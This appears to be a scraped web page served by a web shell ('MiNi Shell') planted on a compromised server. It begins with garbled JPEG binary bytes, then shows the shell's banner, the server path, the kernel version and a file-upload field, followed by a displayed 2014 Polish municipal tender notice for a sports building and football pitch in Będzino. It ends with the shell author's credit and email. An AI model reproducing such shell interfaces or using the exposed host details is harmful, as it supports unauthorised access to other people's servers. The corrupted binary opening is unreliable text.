JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140828/286880-N-2014.html

<p class="kh_header"><b>Będzino: Budowa infrastruktury sportowej i rekreacyjnej na terenie Gminy Będzino - budynek socjalny, zaplecze do obsługi zespołu sportowego,  zlokalizowany w miejscowości Będzino (zadanie nr 1) oraz zagospodarowanie  boiska sportowego w Będzinie ( zadanie nr 2)</b><br>
<b>Numer ogłoszenia: 286880 - 2014; data zamieszczenia: 28.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Będzino , Będzino 19, 76-037 Będzino, woj. zachodniopomorskie, tel. 94 3162530, faks 94 3162307.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bedzino.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa infrastruktury sportowej i rekreacyjnej na terenie Gminy Będzino - budynek socjalny, zaplecze do obsługi zespołu sportowego,  zlokalizowany w miejscowości Będzino (zadanie nr 1) oraz zagospodarowanie  boiska sportowego w Będzinie ( zadanie nr 2).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : 
Zadanie nr 1 :  budowa  budynku  socjalnego - zaplecza do obsługi zespołu sportowego,zlokalizowanego w miejscowości Będzino działka nr 109/6 , wraz z uzyskaniem pozwolenia  na użytkowanie . 
Charakterystyka : powierzchnia użytkowa 60,27m2 ,kubatura 150,67m3 , bryła 
jednokondygnacyjna, kryta jednospadowym dachem  z pokryciem blachą trapezową 
Zakres robót obejmuje : 
1.1).Roboty ogólnobudowlane :roboty ziemne ,roboty fundamentowe ,roboty murowe , konstrukcja przyziemia ,roboty  wykończeniowe ,dach ,stolarka .
1.2).Zalicznikowa instalacja  odbiorcza .
1.3).Przyłącze i zewnętrzne  instalacje wodociągowa, kanalizacji  sanitarnej .
1.4).Wewnętrzne instalacje energetyczne.
1.5).Wewnętrzne instalacje sanitarne .
Szczegółowy opis przedmiotu zamówienia i zakres  robót  przewidzianych do wykonania zadania określa dokumentacja projektowa ( projekt budowlany, przedmiary robót)  oraz specyfikacja  techniczna wykonania i odbioru robót , które stanowią załączniki dospecyfikacji istotnych warunków zamówienia. 
Zadanie nr 2 : zagospodarowanie  boiska sportowego w miejscowości Będzino poprzez rekultywację płyty istniejącego boiska sportowego , wysiew trawy sportowej oraz pielęgnację do pełnego zagęszczenia ( powierzchnia 6200,00m2)  wraz z dostawą i montażem  wiat dla zawodników rezerwowych (13 osobowa) szt.2;  bramek do piłki nożnej szt.2;  ławek dla kibiców (16 miejscowych ) szt.2;  ławek dla kibiców (17 miejscowych ) szt. 4 ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.50-7, 45.21.22.21-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu  dokonywania oceny  spełniania przedmiotowego  
 warunku ,ponieważ przepisy prawa nie nakładają takiego obowiązku ;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony ,jeżeli wykonawca wykaże, że  :
posiada  doświadczenie zawodowe , legitymując się wykonaniem (zakończeniem ) w okresie  ostatnich pięciu lat przed upływem terminu  składania ofert, a jeżeli  okres  prowadzenia działalności  jest krótszy - w tym okresie  ,  co najmniej dwóch robót (potwierdzone dowodami, czy roboty te zostały wykonane w sposób należyty oraz  wskazującymi czy wykonane  zostały zgodnie z zasadami sztuki budowlanej i prawidłowo  ukończone) polegających na budowie obiektu budowlanego  o wartości  robót co najmniej 150.000 zł , każdy;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje szczegółowych warunków w powyższym zakresie. Wykonawca  potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek , jeżeli wykonawca wskaże , że :
dysponuje  osobą , która  będzie uczestniczyć w wykonaniu zamówienia - pełnić funkcję kierownika budowy, posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez  ograniczeń, w rozumieniu ustawy z 7 lipca 1994 r. - Prawo budowlane (Dz.U.13.1409 ze zm.) lub odpowiadające im uprawnienia zdobyte na podstawie wcześniej obowiązujących przepisów,  jeżeli przepisy nowsze nie uchyliły ważności tych uprawnień, lub odpowiadające im uprawnienia  zdobyte poza granicami Polski, a uznane na podstawie przepisów odrębnych ;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek , jeżeli wykonawca wskaże , że :
posiada środki finansowe lub zdolność kredytową  w wysokości nie niższej niż 100.000,00 ZŁ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>W załączniku nr 3 do siwz Wykonawca przedstawi najważniejsze roboty, których dotyczy obowiązek załączenia  dowodów . Przez najważniejsze roboty Zamawiający rozumie roboty, o których mowa w rozdz. V pkt  2 ppkt 2.2. siwz ,odpowiednio sekcja III.3.2.)Wiedza i doświadczenie  nin. ogłoszenia o zamówieniu;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zestawienie rzeczowo-finansowe dla zadania nr 1 ( wg  zał. nr 1a );
formularz cenowy  dla zadania nr 2( wg  zał. nr 1b ); pełnomocnictwo (jeżeli dotyczy )</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana zawartej  umowy w stosunku  do treści oferty , na podstawie której  dokonano  wyboru jest możliwa  m.in. gdy :
1)Wystąpiła zmiana powszechnie obowiązujących  przepisów prawa w zakresie  mającym   wpływ na realizację   przedmiotu umowy.
2)Odstąpienia  na wniosek zamawiającego od realizacji części zamówienia i  związanej  z tym zmiany wynagrodzenia, pod warunkiem  wystąpienia obiektywnych okoliczności ,  których zamawiający nie mógł  przewidzieć  na etapie  przygotowania postępowania, a które powodują , że  wykonanie przedmiotu  zamówienia  bez ograniczenia  zakresu zamówienia, powodowałyby dla Zamawiającego  niekorzystne skutki z  uwagi  na  zamierzony cel realizacji  przedmiotu zamówienia  i związane  z tym racjonalne  wydatkowanie  środków 
publicznych ;
3) Wystąpiła konieczność zmiany osób (śmierć, choroba, ustanie stosunku pracy (rezygnacja),  inne zdarzenia   losowe ) przy pomocy ,których Wykonawca realizuje przedmiot umowy.
4) Wystąpiła  konieczność zmian osób, w przypadku gdy Zamawiający uzna , że  osoby te  nie wykonują   należycie swoich obowiązków.
5) Wystąpiła zmiana terminu realizacji przedmiotu umowy  z przyczyn  niezależnych od Wykonawcy, z przyczyn  określonych w § 2 ust . 4 nn umowy , a także w wyniku podpisania   umowy  o dofinansowanie  ww.   inwestycji w ramach PROW na lata 2007-2013. 
2. Zamawiający przewiduje zmiany zakresu Przedmiotu Zamówienia  i zmianę terminu realizacji umowy w sytuacji wystąpienia okoliczności, których nie mógł przewidzieć przed wszczęciem niniejszego postępowania, a wystąpienie których uniemożliwiło terminową  realizację zamówienia, w szczególności polegających na:
1) pojawieniu się niemożliwych wcześniej do przewidzenia przeszkód technicznych podczas  robót ziemnych tj. np. niezinwentaryzowanych fundamentów, opóźnienia w przekazaniu przez Zamawiającego placu budowy, 
2)konieczności  wykonania zamówienia dodatkowego (robót dodatkowych) lub 
 robót zamiennych  mających wpływ na termin wykonania zamówienia  podstawowego,
3) stwierdzeniu odmiennych od przyjętych przez autorów projektu budowlanego warunków  gruntowo-wodnych na terenie wykonywania Przedmiotu Zamówienia,
4) wystąpieniu istotnych, z punktu widzenia terminu realizacji umowy (co Wykonawca  wykaże), błędów projektowych i/lub skutkujących koniecznością zmiany dokumentacji  projektowej,
5) zaistnieniu przeszkód spowodowanych m.in. siłami natury i konieczności wykonania robót zamiennych i/lub zaniechanych,
3. Gdy zaistnieje  inna, niemożliwa do przewidzenia  w momencie zawarcia umowy 
 okoliczność prawna , ekonomiczna lub techniczna , za którą żadna ze stron  nie ponosi  odpowiedzialności , skutkująca  brakiem możliwości  należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia -  zamawiający dopuszcza  możliwość zmiany umowy, w szczególności  terminu realizacji zamówienia.
4. W przypadku wystąpienia któregokolwiek ze zdarzeń  wymienionych w ust. 1 do 3 termin  realizacji przedmiotu  umowy może ulec odpowiedniemu  przedłużeniu, o czas niezbędnydo zakończenia  wykonywania  jej   przedmiotu w sposób  należyty , nie dłużej jednak ,niż o okres trwania tych okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bedzino.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Będzino, 76-037 Będzino 19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2014 godzina 10:00, miejsce: Urząd Gminy Będzino, 76-037 Będzino 19 - sekretariat pok. nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizacja  Zadania nr 1  w ramach projektu :Budowa infrastruktury sportowej i rekreacyjnej na terenie Gminy  Będzino  w ramach działania 413 Wdrażanie lokalnych strategii rozwoju dla  operacji, które  odpowiadają warunkom  przyznania pomocy w ramach działania Odnowa i rozwój wsi - Wniosek o przyznanie pomocy .
Realizacja  Zadania nr 2  w ramach projektu Budowa placów  zabaw  w miejscowości Dworek oraz  zagospodarowanie  boiska sportowego  w miejscowości Będzino  projekt dofinansowany ze środków Unii Europejskiej w ramach działania 413 Wdrażanie lokalnych strategii rozwoju w zakresie operacji odpowiadających warunkom  przyznania pomocy w ramach działania Odnowa i rozwój wsi objętego Programem  Rozwoju Obszarów  Wiejskich na lata  2007-2013 - Umowa NR  00889-6930-UM1630389/13.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa infrastruktury sportowej i rekreacyjnej na terenie Gminy Będzino - budynek socjalny, zaplecze do obsługi zespołu sportowego,  zlokalizowany w miejscowości Będzino (zadanie nr 1).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> budowa  budynku  socjalnego - zaplecza do obsługi zespołu sportowego,
 zlokalizowanego w miejscowości Będzino działka nr 109/6 , wraz z uzyskaniem pozwolenia  na 
 użytkowanie . 
 Charakterystyka : powierzchnia użytkowa 60,27m2 ,kubatura 150,67m3 , bryła 
 jednokondygnacyjna, kryta jednospadowym dachem  z pokryciem blachą trapezową ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.50-7, 45.21.22.21-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zagospodarowanie  boiska sportowego w Będzinie ( zadanie nr 2).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zagospodarowanie  boiska sportowego w miejscowości Będzino poprzez rekultywację płyty istniejącego boiska sportowego , wysiew trawy sportowej oraz pielęgnację do pełnego zagęszczenia ( powierzchnia 6200,00m2)  wraz z dostawą i montażem  wiat dla zawodników rezerwowych (13 osobowa )szt. 2;  bramek do piłki nożnej szt. 2;  ławek dla kibiców (16 miejscowych ) szt. 2;  ławek dla kibiców
 (17 miejscowych ) szt. 4 ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com